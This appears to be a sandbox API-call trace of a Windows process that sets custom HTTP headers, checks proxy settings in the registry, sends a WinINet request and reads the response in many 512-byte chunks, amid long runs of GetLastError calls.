	[0080.719] GetLastError () returned 0x0
	[0080.719] GetLastError () returned 0x0
	[0080.719] GetLastError () returned 0x0
	[0080.719] GetLastError () returned 0x0
	[0080.719] GetLastError () returned 0x0
	[0080.719] GetLastError () returned 0x0
	[0080.719] GetLastError () returned 0x0
	[0080.719] GetLastError () returned 0x0
	[0080.719] GetLastError () returned 0x0
	[0080.719] GetLastError () returned 0x0
	[0080.719] GetLastError () returned 0x0
	[0080.719] GetLastError () returned 0x0
	[0080.719] GetLastError () returned 0x0
	[0080.719] GetLastError () returned 0x0
	[0080.719] GetLastError () returned 0x0
	[0080.719] GetLastError () returned 0x0
	[0080.719] GetLastError () returned 0x0
	[0080.719] GetLastError () returned 0x0
	[0080.719] GetLastError () returned 0x0
	[0080.719] GetLastError () returned 0x0
	[0080.719] GetLastError () returned 0x0
	[0080.719] GetLastError () returned 0x0
	[0080.719] GetLastError () returned 0x0
	[0080.719] GetLastError () returned 0x0
	[0080.719] GetLastError () returned 0x0
	[0080.719] GetLastError () returned 0x0
	[0080.719] GetLastError () returned 0x0
	[0080.719] GetLastError () returned 0x0
	[0080.719] GetLastError () returned 0x0
	[0080.719] GetLastError () returned 0x0
	[0080.719] GetLastError () returned 0x0
	[0080.719] GetLastError () returned 0x0
	[0080.719] GetLastError () returned 0x0
	[0080.719] GetLastError () returned 0x0
	[0080.719] GetLastError () returned 0x0
	[0080.719] GetLastError () returned 0x0
	[0080.719] GetLastError () returned 0x0
	[0080.719] GetLastError () returned 0x0
	[0080.719] GetLastError () returned 0x0
	[0080.719] GetLastError () returned 0x0
	[0080.719] GetLastError () returned 0x0
	[0080.719] GetLastError () returned 0x0
	[0080.719] GetLastError () returned 0x0
	[0080.719] GetLastError () returned 0x0
	[0080.719] GetLastError () returned 0x0
	[0080.719] GetLastError () returned 0x0
	[0080.719] GetLastError () returned 0x0
	[0080.719] GetLastError () returned 0x0
	[0080.719] GetLastError () returned 0x0
	[0080.719] GetLastError () returned 0x0
	[0080.719] GetLastError () returned 0x0
	[0080.719] GetLastError () returned 0x0
	[0080.719] GetLastError () returned 0x0
	[0080.719] GetLastError () returned 0x0
	[0080.719] GetLastError () returned 0x0
	[0080.720] GetLastError () returned 0x0
	[0080.720] GetLastError () returned 0x0
	[0080.720] GetLastError () returned 0x0
	[0080.720] GetLastError () returned 0x0
	[0080.720] GetLastError () returned 0x0
	[0080.720] GetLastError () returned 0x0
	[0080.720] GetLastError () returned 0x0
	[0080.720] GetLastError () returned 0x0
	[0080.720] GetLastError () returned 0x0
	[0080.720] GetLastError () returned 0x0
	[0080.720] GetLastError () returned 0x0
	[0080.720] GetLastError () returned 0x0
	[0080.720] GetLastError () returned 0x0
	[0080.720] GetLastError () returned 0x0
	[0080.720] GetLastError () returned 0x0
	[0080.720] GetLastError () returned 0x0
	[0080.720] GetLastError () returned 0x0
	[0080.720] GetLastError () returned 0x0
	[0080.720] GetLastError () returned 0x0
	[0080.720] GetLastError () returned 0x0
	[0080.720] GetLastError () returned 0x0
	[0080.720] GetLastError () returned 0x0
	[0080.720] GetLastError () returned 0x0
	[0080.720] GetLastError () returned 0x0
	[0080.720] GetLastError () returned 0x0
	[0080.720] GetLastError () returned 0x0
	[0080.720] GetLastError () returned 0x0
	[0080.720] GetLastError () returned 0x0
	[0080.720] GetLastError () returned 0x0
	[0080.720] GetLastError () returned 0x0
	[0080.720] GetLastError () returned 0x0
	[0080.720] lstrlenW (lpString="X-HTTP-Agent: WININET") returned 21
	[0080.720] HttpAddRequestHeadersW (hRequest=0xcc000c, lpszHeaders="X-HTTP-Agent: WININET", dwHeadersLength=0x15, dwModifiers=0x10000000) returned 1
	[0080.720] GetLastError () returned 0x0
	[0080.720] GetLastError () returned 0x0
	[0080.720] GetLastError () returned 0x0
	[0080.720] GetLastError () returned 0x0
	[0080.720] GetLastError () returned 0x0
	[0080.720] GetLastError () returned 0x0
	[0080.720] GetLastError () returned 0x0
	[0080.720] GetLastError () returned 0x0
	[0080.720] GetLastError () returned 0x0
	[0080.720] GetLastError () returned 0x0
	[0080.720] GetLastError () returned 0x0
	[0080.720] GetLastError () returned 0x0
	[0080.720] GetLastError () returned 0x0
	[0080.720] GetLastError () returned 0x0
	[0080.720] GetLastError () returned 0x0
	[0080.720] GetLastError () returned 0x0
	[0080.720] GetLastError () returned 0x0
	[0080.720] GetLastError () returned 0x0
	[0080.720] GetLastError () returned 0x0
	[0080.720] GetLastError () returned 0x0
	[0080.721] GetLastError () returned 0x0
	[0080.721] GetLastError () returned 0x0
	[0080.721] GetLastError () returned 0x0
	[0080.721] GetLastError () returned 0x0
	[0080.721] GetLastError () returned 0x0
	[0080.721] GetLastError () returned 0x0
	[0080.721] GetLastError () returned 0x0
	[0080.721] GetLastError () returned 0x0
	[0080.721] GetLastError () returned 0x0
	[0080.721] GetLastError () returned 0x0
	[0080.721] GetLastError () returned 0x0
	[0080.721] GetLastError () returned 0x0
	[0080.721] GetLastError () returned 0x0
	[0080.721] GetLastError () returned 0x0
	[0080.721] GetLastError () returned 0x0
	[0080.721] GetLastError () returned 0x0
	[0080.721] GetLastError () returned 0x0
	[0080.721] GetLastError () returned 0x0
	[0080.721] GetLastError () returned 0x0
	[0080.721] GetLastError () returned 0x0
	[0080.721] GetLastError () returned 0x0
	[0080.721] GetLastError () returned 0x0
	[0080.721] GetLastError () returned 0x0
	[0080.721] GetLastError () returned 0x0
	[0080.721] HttpAddRequestHeadersW (hRequest=0xcc000c, lpszHeaders="X-Proxy-Present: FALSE", dwHeadersLength=0x16, dwModifiers=0x10000000) returned 1
	[0080.721] lstrlenW (lpString="X-Proxy-Used: FALSE") returned 19
	[0080.721] HttpAddRequestHeadersW (hRequest=0xcc000c, lpszHeaders="X-Proxy-Used: FALSE", dwHeadersLength=0x13, dwModifiers=0x10000000) returned 1
	[0080.721] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x26af2c8 | out: phkResult=0x26af2c8*=0x2c8) returned 0x0
	[0080.721] RegQueryValueExW (in: hKey=0x2c8, lpValueName="AutoDetect", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x26af2cc*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x26af2cc*=0x0) returned 0x2
	[0080.721] RegCloseKey (hKey=0x2c8) returned 0x0
	[0080.721] HttpAddRequestHeadersW (hRequest=0xcc000c, lpszHeaders="X-Proxy-AutoDetect: FALSE", dwHeadersLength=0x19, dwModifiers=0x10000000) returned 1
	[0080.721] InternetQueryOptionA (in: hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x26afb1c, lpdwBufferLength=0x26afafc | out: lpBuffer=0x26afb1c, lpdwBufferLength=0x26afafc) returned 1
	[0080.722] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x26afb1c, dwBufferLength=0x4) returned 1
	[0080.722] HttpSendRequestA (in: hRequest=0xcc000c, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0 | out: lpOptional=0x0*) returned 1
	[0084.429] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x26afb24, lpdwBufferLength=0x26afb28, lpdwIndex=0x0 | out: lpBuffer=0x26afb24*, lpdwBufferLength=0x26afb28*=0x4, lpdwIndex=0x0) returned 1
	[0084.429] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x20000005, lpBuffer=0x26afc74, lpdwBufferLength=0x26afb28, lpdwIndex=0x0 | out: lpBuffer=0x26afc74*, lpdwBufferLength=0x26afb28*=0x4, lpdwIndex=0x0) returned 1
	[0084.431] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.432] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.432] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.432] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.432] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.432] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.432] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.432] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.432] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.432] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.432] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.432] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.432] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.432] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.432] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.432] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.432] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.432] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.432] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.432] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.432] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.432] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.432] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.432] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.432] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.432] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.432] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.432] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.432] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.432] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.432] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.432] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.432] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.432] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.432] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.433] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.433] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.433] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.433] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.433] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.433] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.433] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.433] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.433] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.433] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.433] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.433] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.433] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.433] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.433] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.433] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.433] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.433] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.433] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.433] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.433] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.433] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.433] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.433] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.433] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.433] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.433] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.433] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.433] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.433] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.472] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.472] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.472] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.472] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.472] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.472] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.472] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.472] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.472] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.472] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.472] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.472] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.472] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.472] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.472] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.472] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
	[0084.472] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x26af8f4, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x26afc68 | out: lpBuffer=0x26af8f4*, lpdwNumberOfBytesRead=0x26afc68*=0x200) returned 1
